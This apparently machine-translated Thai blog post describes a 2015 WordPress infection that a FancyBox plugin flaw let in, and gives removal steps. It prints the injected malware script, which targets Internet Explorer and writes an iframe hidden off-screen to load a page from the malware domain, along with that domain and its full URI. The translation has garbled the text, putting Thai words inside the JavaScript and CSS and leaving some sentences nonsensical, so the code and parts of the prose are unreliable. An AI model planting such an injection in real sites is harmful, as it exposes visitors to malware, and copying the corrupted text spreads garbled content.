[มัลแวร์ iframe 203koko] มัลแวร์ WordPress เว็บไซต์ที่ติดเชื้อ

สัปดาห์ก่อนหน้านี้จำนวนของเว็บไซต์และบล็อก WordPressได้รับคำเตือนแล้ว การติดเชื้อมัลแวร์ ตลอด Google เว็บมาสเตอร์.

ปัญหาที่เกิดขึ้นว่า Google เว็บมาสเตอร์ เรียกว่าคือการปรากฏตัวของการให้ รหัส / ต้นฉบับ iframe มัลแวร์ หน้าเว็บของแหล่งที่มา

<script> ถ้า (navigator.userAgent.match (/ MSIE / i)) document.write ( '{<div style = "position: absolute; ซ้าย: -2000px ความกว้าง: 2000px"> <iframe src = "http: / /203koko.eu/hjnfh/ipframe2.php "width =" 20 "height =" 30 "> </ iframe> </ div> '); } </ script>

ดูเหมือนว่ามันเป็น ความอ่อนแอ a เสียบเข้าไปacquis FancyBox สำหรับ WordPress ซึ่งจนถึงเมื่อวานนี้ (05.02.2015) ไม่ได้รับการปรับปรุงมาเป็นเวลานาน
การแก้ปัญหานี้และ ฆ่าเชื้อไวรัสเว็บไซต์ กับมัลแวร์นี้ค่อนข้างง่าย
1 ปิดใช้งานปลั๊กอิน FancyBox
2 ลบไฟล์ปลั๊กอิน FancyBox จากเซิร์ฟเวอร์ (ผ่านทาง FTP)
3 ติดตั้งปลั๊กอินเวอร์ชันใหม่ (Fancybox 3.0.4)

Fancybox สำหรับ WordPress 3.0.4

- เปลี่ยนชื่อการตั้งค่าที่ได้รับผลกระทบจากปัญหาความปลอดภัยที่กล่าวถึงใน 3.0.3 ซึ่งจะทำให้โค้ดที่เป็นอันตรายไม่ปรากฏในไซต์ที่มีการอัปเดตปลั๊กอินโดยไม่ต้องลบโค้ดที่เป็นอันตราย

Fancybox สำหรับ WordPress 3.0.3

- แก้ไขปัญหาการรักษาความปลอดภัย.

ข้อมูลมัลแวร์:

ประเภท: Iframe เปลี่ยนเส้นทาง
เป้าหมาย: Fancybox WordPress
DOMAIN มัลแวร์: 203koko.eu
มัลแวร์ URI: http://203koko.eu/hjnfh/ipframe2.php
รหัสมัลแวร์ RAW: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = "20" height = "30"> </ iframe>
มัลแวร์ SCRIPT <script> ถ้า (navigator.userAgent.match (/ MSIE / i)) {document.write ('<div style = "position: absolute; ซ้าย: -2000px ความกว้าง: 2000px">

ลบมัลแวร์ได้จากเว็บไซต์ของคุณ WordPress.

[มัลแวร์ iframe 203koko] มัลแวร์ WordPress เว็บไซต์ที่ติดเชื้อ

เกี่ยวกับผู้เขียน

ชิงทรัพย์แผ่นเสียง

ผู้ก่อตั้งและบรรณาธิการ การตั้งค่าชิงทรัพย์ในวันที่ 2006
ประสบการณ์เกี่ยวกับระบบปฏิบัติการ Linux (โดยเฉพาะ CentOS), Mac OS X Windows XP> Windows 10 และ WordPress (CMS)

แสดงความคิดเห็น